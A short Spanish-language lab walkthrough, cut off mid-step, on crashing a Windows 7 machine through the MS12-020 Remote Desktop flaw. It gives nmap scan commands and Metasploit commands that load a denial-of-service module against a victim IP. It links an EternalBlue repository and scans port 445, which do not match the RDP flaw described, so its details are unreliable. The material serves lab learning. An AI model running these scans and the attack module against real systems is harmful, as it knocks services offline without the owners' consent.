Está en la página 1de 1

imagen de windows 7 utilizada

https://drive.google.com/file/d/1zIk-lURk9aZSsW_FqnorJSQvzTG3J3v2/view
1.- paso

la vulnerabilidad esta en
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020
github del exploit
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
para activar la vulnerabilidad manualmente

entramos en propiedades del equipo>>Configuracion avanzada del


sistema>>Configuracion del acceso remoto
la opcion de permitir conexiones de asistencia remota
permitir las conexiones desde equipos que ejecuten cualquier version de escritorio
remoto

analizamos la ip del objetivo con nmap


>nmap -sS -T4 192.168.1.112

analizar la red en busca del objetivo con puerto 445


>nmap -p 445 --open 192.168.1.1/24

el escaneo nos dara la direccion ip de la victima dentro de la red


192.168.1.112

iniciamos metasploit
>service postgresql start
>msfconsole
>use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
>show options
>set rhost [ip_victima]
>set rport

También podría gustarte